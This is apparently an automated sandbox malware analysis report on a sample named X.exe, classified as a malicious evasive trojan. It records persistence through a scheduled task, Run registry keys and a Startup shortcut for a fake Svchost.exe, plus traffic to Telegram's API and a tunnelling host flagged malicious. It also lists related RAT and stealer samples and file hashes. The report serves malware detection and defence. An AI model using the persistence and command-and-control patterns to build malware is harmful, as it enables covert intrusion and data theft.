                                                                                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymoussvchost.exe, 00000012.00000002.4521550829.00000152D0937000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80605svchost.exe, 00000012.00000003.4013433507.00000152D0929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013575095.00000152D0952000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfJsvchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80604svchost.exe, 00000012.00000003.4013433507.00000152D0929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013575095.00000152D0952000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://account.live.com/msangcwamsvchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013433507.00000152D0929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013744014.00000152D0957000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013575095.00000152D0952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srfsvchost.exe, 00000012.00000003.4013536862.00000152D0910000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://crl.ver)svchost.exe, 00000012.00000002.4521274770.00000152D00DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              low
                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsoasvchost.exe, 00000012.00000003.4046777825.00000152D0953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046596064.00000152D0952000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://passport.net/tbsvchost.exe, 00000012.00000002.4521911037.00000152D0E5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521120511.00000152D0081000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  http://upx.sf.netAmcache.hve.17.drfalse
                                                                                                                    high
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/Issuesvchost.exe, 00000012.00000003.4032063230.00000152D0956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4032063230.00000152D095A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd%svchost.exe, 00000012.00000003.4046777825.00000152D0953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046596064.00000152D0952000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdxmlsvchost.exe, 00000012.00000003.4046777825.00000152D0953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046596064.00000152D0952000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfsvchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://account.live.com/Wizard/Password/Change?id=80601svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013433507.00000152D092C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013433507.00000152D0929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4014124615.00000152D0956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013575095.00000152D0952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlns:psvchost.exe, 00000012.00000003.4031942080.00000152D0953000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/scsvchost.exe, 00000012.00000002.4521525759.00000152D0913000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521577838.00000152D095F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4056518662.00000152D0966000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAAAAAsvchost.exe, 00000012.00000003.4039112538.00000152D0955000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://account.live.com/inlinesignup.aspx?iww=1&id=80600svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdcuritysvchost.exe, 00000012.00000003.4046777825.00000152D0953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046596064.00000152D0952000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuesvchost.exe, 00000012.00000002.4521622170.00000152D096F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046796242.00000152D096E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046462354.00000152D096D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAsvchost.exe, 00000012.00000003.4032113255.00000152D090E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521505766.00000152D090F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046392383.00000152D0907000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046671128.00000152D090E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://login.microsoftonline.com/ppsecure/DeviceUpdate.srfsvchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/scerencesvchost.exe, 00000012.00000002.4521550829.00000152D0937000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://login.ecursvchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://account.live.com/inlinesignup.aspx?iww=1&id=80605svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfREsvchost.exe, 00000012.00000003.4013536862.00000152D0910000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsa=svchost.exe, 00000012.00000003.4046777825.00000152D0953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046596064.00000152D0952000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://account.live.com/inlinesignup.aspx?iww=1&id=80603svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://account.live.com/inlinesignup.aspx?iww=1&id=80604svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdsvchost.exe, 00000012.00000003.4046671128.00000152D090E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4031942080.00000152D0953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046617502.00000152D095C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                              149.154.167.220
                                                                                                                                                              api.telegram.orgUnited Kingdom
                                                                                                                                                              62041TELEGRAMRUfalse
                                                                                                                                                              167.71.56.116
                                                                                                                                                              eu-central-7075.packetriot.netUnited States
                                                                                                                                                              14061DIGITALOCEAN-ASNUStrue
                                                                                                                                                              Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                              Analysis ID:1387988
                                                                                                                                                              Start date and time:2024-02-07 03:21:06 +01:00
                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                              Overall analysis duration:0h 7m 55s
                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                              Report type:full
                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                              Number of analysed new started processes analysed:19
                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                              Technologies:
                                                                                                                                                              • HCA enabled
                                                                                                                                                              • EGA enabled
                                                                                                                                                              • AMSI enabled
                                                                                                                                                              Analysis Mode:default
                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                              Sample name:X.exe
                                                                                                                                                              Detection:MAL
                                                                                                                                                              Classification:mal100.troj.evad.winEXE@18/10@5/2
                                                                                                                                                              EGA Information:Failed
                                                                                                                                                              HCA Information:
                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                              • Number of executed functions: 105
                                                                                                                                                              • Number of non-executed functions: 0
                                                                                                                                                              Cookbook Comments:
                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 20.190.157.11, 40.126.29.14, 40.126.29.15, 40.126.29.10, 40.126.29.9, 40.126.29.8, 40.126.29.11, 40.126.29.6, 13.89.179.12
                                                                                                                                                              • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                                                              • Execution Graph export aborted for target Svchost.exe, PID 1176 because it is empty
                                                                                                                                                              • Execution Graph export aborted for target Svchost.exe, PID 3088 because it is empty
                                                                                                                                                              • Execution Graph export aborted for target Svchost.exe, PID 5632 because it is empty
                                                                                                                                                              • Execution Graph export aborted for target Svchost.exe, PID 5896 because it is empty
                                                                                                                                                              • Execution Graph export aborted for target Svchost.exe, PID 6256 because it is empty
                                                                                                                                                              • Execution Graph export aborted for target Svchost.exe, PID 6460 because it is empty
                                                                                                                                                              • Execution Graph export aborted for target Svchost.exe, PID 6884 because it is empty
                                                                                                                                                              • Execution Graph export aborted for target X.exe, PID 7096 because it is empty
                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                              TimeTypeDescription
                                                                                                                                                              03:21:57Task SchedulerRun new task: Svchost path: C:\Users\user\AppData\Local\Temp\Svchost.exe
                                                                                                                                                              03:21:57API Interceptor9957094x Sleep call for process: X.exe modified
                                                                                                                                                              03:21:57AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Svchost C:\Users\user\AppData\Local\Temp\Svchost.exe
                                                                                                                                                              03:22:07AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Svchost C:\Users\user\AppData\Local\Temp\Svchost.exe
                                                                                                                                                              03:22:15AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Svchost.lnk
                                                                                                                                                              03:25:10API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              149.154.167.220IMG-01-22-20148398239999823489282222_pdf.JSGet hashmaliciousAMSIReaper, AgentTeslaBrowse
                                                                                                                                                                SecuriteInfo.com.Win32.PWSX-gen.12031.21211.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                  Arkansashighways Detail_ Salary _ UpgradeC38314A8026E_pdf.htmlGet hashmaliciousHTMLPhisher, WSHRATBrowse
                                                                                                                                                                    Arkansashighways Detail_ Salary _ Upgrade0D1F7DF294C2_pdf.htmlGet hashmaliciousHTMLPhisher, WSHRATBrowse
                                                                                                                                                                      SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                        https://www.mediafire.com/file/8eop2r1ad81z2k2/Sipari%C5%9F+&Ouml;zellikleri+pdf.tgz/fileGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                          A1234.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                            SecuriteInfo.com.Win32.PWSX-gen.19724.10468.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              1.jsGet hashmaliciousAMSIReaperBrowse
                                                                                                                                                                                NlVGatrBgz.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                  167.71.56.116SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                    WinScanGuard_v.2.1.batGet hashmaliciousQuasarBrowse
                                                                                                                                                                                      Shadow-Stealer.batGet hashmaliciousQuasarBrowse
                                                                                                                                                                                        OvA6x5v34G.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                                          zUYpYikG7T.exeGet hashmaliciousnjRatBrowse
                                                                                                                                                                                            SdwkQEBnc3.exeGet hashmaliciousNanocoreBrowse
                                                                                                                                                                                              riV1K85Awe.exeGet hashmaliciousNanocoreBrowse
                                                                                                                                                                                                Malwarebytes Gears.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                                                  H8RZSly6dG.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                                                    8E8732B9BEBC8382E938B48697E79FEB4B06528DF41FD.exeGet hashmaliciousnjRatBrowse
                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                      eu-central-7075.packetriot.netSecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                      • 167.71.56.116
                                                                                                                                                                                                      WinScanGuard_v.2.1.batGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                      • 167.71.56.116
                                                                                                                                                                                                      Shadow-Stealer.batGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                      • 167.71.56.116
                                                                                                                                                                                                      OvA6x5v34G.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                                                      • 167.71.56.116
                                                                                                                                                                                                      zUYpYikG7T.exeGet hashmaliciousnjRatBrowse
                                                                                                                                                                                                      • 167.71.56.116
                                                                                                                                                                                                      SdwkQEBnc3.exeGet hashmaliciousNanocoreBrowse
                                                                                                                                                                                                      • 167.71.56.116
                                                                                                                                                                                                      riV1K85Awe.exeGet hashmaliciousNanocoreBrowse
                                                                                                                                                                                                      • 167.71.56.116
                                                                                                                                                                                                      Malwarebytes Gears.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                                                      • 167.71.56.116
                                                                                                                                                                                                      api.telegram.orgIMG-01-22-20148398239999823489282222_pdf.JSGet hashmaliciousAMSIReaper, AgentTeslaBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      SecuriteInfo.com.Win32.PWSX-gen.12031.21211.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      Arkansashighways Detail_ Salary _ UpgradeC38314A8026E_pdf.htmlGet hashmaliciousHTMLPhisher, WSHRATBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      Arkansashighways Detail_ Salary _ Upgrade0D1F7DF294C2_pdf.htmlGet hashmaliciousHTMLPhisher, WSHRATBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      https://www.mediafire.com/file/8eop2r1ad81z2k2/Sipari%C5%9F+&Ouml;zellikleri+pdf.tgz/fileGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      A1234.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      SecuriteInfo.com.Win32.PWSX-gen.19724.10468.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      1.jsGet hashmaliciousAMSIReaperBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      NlVGatrBgz.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                      TELEGRAMRUIMG-01-22-20148398239999823489282222_pdf.JSGet hashmaliciousAMSIReaper, AgentTeslaBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      SecuriteInfo.com.Win32.PWSX-gen.12031.21211.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      Arkansashighways Detail_ Salary _ UpgradeC38314A8026E_pdf.htmlGet hashmaliciousHTMLPhisher, WSHRATBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      Arkansashighways Detail_ Salary _ Upgrade0D1F7DF294C2_pdf.htmlGet hashmaliciousHTMLPhisher, WSHRATBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      https://telegra.ph/St-JCPD-02-05-2Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                      • 149.154.164.13
                                                                                                                                                                                                      https://www.mediafire.com/file/8eop2r1ad81z2k2/Sipari%C5%9F+&Ouml;zellikleri+pdf.tgz/fileGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      A1234.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      rNUBzMB8Cm.exeGet hashmaliciousClipboard Hijacker, Djvu, Fabookie, Glupteba, RedLine, SmokeLoader, StealcBrowse
                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                      SecuriteInfo.com.Win32.PWSX-gen.19724.10468.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      DIGITALOCEAN-ASNUShttps://fvitz.tyru.lat/?igk=iuyvqsdmlld2luZ0Bjb25zaWdubWVudGdhbGxlcnkuY2E=Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                      • 206.81.16.83
                                                                                                                                                                                                      file.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                      • 159.89.100.67
                                                                                                                                                                                                      http://applicationnoisy.top/fb7rlxlyq1tmqk4/4hfhfjb5hdj35f/Get hashmaliciousGRQ ScamBrowse
                                                                                                                                                                                                      • 198.211.98.91
                                                                                                                                                                                                      Arkansashighways Detail_ Salary _ UpgradeC38314A8026E_pdf.htmlGet hashmaliciousHTMLPhisher, WSHRATBrowse
                                                                                                                                                                                                      • 159.203.50.177
                                                                                                                                                                                                      https://iconconsulting.in/event/ok/download.phpGet hashmaliciousWSHRATBrowse
                                                                                                                                                                                                      • 159.203.50.177
                                                                                                                                                                                                      Arkansashighways Detail_ Salary _ Upgrade0D1F7DF294C2_pdf.htmlGet hashmaliciousHTMLPhisher, WSHRATBrowse
                                                                                                                                                                                                      • 159.203.50.177
                                                                                                                                                                                                      https://u9934748.ct.sendgrid.net/ls/click?upn=s1N3mofSxViIPxfd5Uz5v2YX6-2BG3QTVZq7LXUPJeI2WvGnKkaqMWHTNcUlI2BA2GBBkO8kPqJ6rjEepgvzYz-2FA-3D-3D9YdY_7-2BzvUTEDUu8MndgRqlGqZtoQe9-2BJ9zsDVnXPgdOyjPyt1Mv8Nz7BkdOEy6YhtzZKfCkGzwfblvYaM8JWjiNG-2B9suwDWpk3hKWAE-2Fnz5Aky0nktQJXrVbpftLlnXgY2J8fIHHF0ju-2Bi7weu-2FYajdNWuwSCekt05zXYxu12OUYBJLOjYHTQ-2FfRrDMN14S4bNIUwafCkpNG5JzL4GVi86OVBm2J37Ny-2Beq8Tw19GGQwVq4-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                      • 139.59.84.37
                                                                                                                                                                                                      nhhqejOP5o.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                      • 157.245.157.99
                                                                                                                                                                                                      MDE_File_Sample_c30dd28cb119f2aa20ddabe8968b8cadbe80bcb2.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      • 167.99.235.203
                                                                                                                                                                                                      SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                      • 167.71.56.116
                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0eIMG-01-22-20148398239999823489282222_pdf.JSGet hashmaliciousAMSIReaper, AgentTeslaBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      GuCuJjOs5c.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      SecuriteInfo.com.Win32.PWSX-gen.25288.2891.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      https://194.26.29.99:9443/updates.rssGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      Al Adrak-RFQ-FEB-2024_PDF.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      Pitsn.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      SecuriteInfo.com.Win32.PWSX-gen.12031.21211.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      New order.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      uche.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Svchost.exeSecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                        Entropy (8bit):1.4337782823391478
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:8dDR5Xek081iHpaWz8iyXECll29IzuiFkZ24lO83nY:a7X281iJa48iXy2SzuiFkY4lO83
                                                                                                                                                                                                        MD5:3D0287B192368C8033BF5405A7CB7A91
                                                                                                                                                                                                        SHA1:3CDEB6AE2A7C0C2CB7B45B9B20F97F8496EDA640
                                                                                                                                                                                                        SHA-256:A2CF780792EE437752395CC58ACA602222FD5AC4D3AF1F9BE99B8AEA3353E8C2
                                                                                                                                                                                                        SHA-512:7E7FA8347AACE42B7F400A06A4FEC3FCD215900B60D26F9B505AF25E5083C73E0BA1E73FF28AAA0A984C4B0477E315DFD976597A926881C907F5BA913934481D
                                                                                                                                                                                                        Malicious:false
